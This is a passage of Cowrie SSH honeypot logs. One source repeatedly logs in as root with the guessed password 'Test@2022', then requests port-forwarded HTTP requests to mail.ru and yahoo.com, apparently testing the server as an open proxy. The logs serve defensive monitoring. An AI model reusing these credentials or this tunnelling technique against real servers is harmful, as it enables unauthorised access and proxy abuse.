nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.487960Z","src_ip":"77.83.207.83","session":"08cba907259a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.738817Z","src_ip":"77.83.207.83","session":"08cba907259a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":2650,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:2650","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.789873Z","session":"08cba907259a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.840288Z","src_ip":"77.83.207.83","session":"08cba907259a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":29353,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:29353","sensor":"my-vps","timestamp":"2025-08-31T03:50:54.984670Z","session":"08cba907259a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.034971Z","src_ip":"77.83.207.83","session":"08cba907259a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":20459,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:20459","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.176623Z","session":"08cba907259a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.227334Z","src_ip":"77.83.207.83","session":"08cba907259a"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.278378Z","src_ip":"77.83.207.83","session":"08cba907259a"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":19706,"dst_ip":"1.2.3.4","dst_port":22,"session":"f11710473308","protocol":"ssh","message":"New connection: 77.83.207.83:19706 (1.2.3.4:22) [session: f11710473308]","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.328069Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.328960Z","src_ip":"77.83.207.83","session":"f11710473308"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.379014Z","src_ip":"77.83.207.83","session":"f11710473308"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.629673Z","src_ip":"77.83.207.83","session":"f11710473308"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":24018,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:24018","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.681038Z","session":"f11710473308"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.731213Z","src_ip":"77.83.207.83","session":"f11710473308"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":23233,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:23233","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.872579Z","session":"f11710473308"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:55.922806Z","src_ip":"77.83.207.83","session":"f11710473308"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":26073,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26073","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.064474Z","session":"f11710473308"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.114815Z","src_ip":"77.83.207.83","session":"f11710473308"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.166278Z","src_ip":"77.83.207.83","session":"f11710473308"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":19823,"dst_ip":"1.2.3.4","dst_port":22,"session":"088b1ed8d96f","protocol":"ssh","message":"New connection: 77.83.207.83:19823 (1.2.3.4:22) [session: 088b1ed8d96f]","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.214632Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.224972Z","src_ip":"77.83.207.83","session":"088b1ed8d96f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.264804Z","src_ip":"77.83.207.83","session":"088b1ed8d96f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.514034Z","src_ip":"77.83.207.83","session":"088b1ed8d96f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4781,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4781","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.564821Z","session":"088b1ed8d96f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.614814Z","src_ip":"77.83.207.83","session":"088b1ed8d96f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":1864,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:1864","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.756795Z","session":"088b1ed8d96f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.806801Z","src_ip":"77.83.207.83","session":"088b1ed8d96f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":24485,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:24485","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.948585Z","session":"088b1ed8d96f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:56.998848Z","src_ip":"77.83.207.83","session":"088b1ed8d96f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.049795Z","src_ip":"77.83.207.83","session":"088b1ed8d96f"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":19909,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbc71ad24031","protocol":"ssh","message":"New connection: 77.83.207.83:19909 (1.2.3.4:22) [session: dbc71ad24031]","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.098697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.108706Z","src_ip":"77.83.207.83","session":"dbc71ad24031"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.148955Z","src_ip":"77.83.207.83","session":"dbc71ad24031"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.397237Z","src_ip":"77.83.207.83","session":"dbc71ad24031"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10715,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:10715","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.447968Z","session":"dbc71ad24031"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.498009Z","src_ip":"77.83.207.83","session":"dbc71ad24031"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":10357,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:10357","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.640195Z","session":"dbc71ad24031"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.690168Z","src_ip":"77.83.207.83","session":"dbc71ad24031"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":13529,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:13529","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.832203Z","session":"dbc71ad24031"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.882352Z","src_ip":"77.83.207.83","session":"dbc71ad24031"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.933249Z","src_ip":"77.83.207.83","session":"dbc71ad24031"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":20007,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce7bbdb98a5b","protocol":"ssh","message":"New connection: 77.83.207.83:20007 (1.2.3.4:22) [session: ce7bbdb98a5b]","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.981915Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:57.982685Z","src_ip":"77.83.207.83","session":"ce7bbdb98a5b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.032546Z","src_ip":"77.83.207.83","session":"ce7bbdb98a5b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.280559Z","src_ip":"77.83.207.83","session":"ce7bbdb98a5b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10673,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10673","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.331094Z","session":"ce7bbdb98a5b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.380824Z","src_ip":"77.83.207.83","session":"ce7bbdb98a5b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":15780,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:15780","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.520106Z","session":"ce7bbdb98a5b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.570027Z","src_ip":"77.83.207.83","session":"ce7bbdb98a5b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":14574,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:14574","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.712303Z","session":"ce7bbdb98a5b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.762434Z","src_ip":"77.83.207.83","session":"ce7bbdb98a5b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.813413Z","src_ip":"77.83.207.83","session":"ce7bbdb98a5b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":20133,"dst_ip":"1.2.3.4","dst_port":22,"session":"743551303a9e","protocol":"ssh","message":"New connection: 77.83.207.83:20133 (1.2.3.4:22) [session: 743551303a9e]","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.862222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:58.872060Z","src_ip":"77.83.207.83","session":"743551303a9e"}
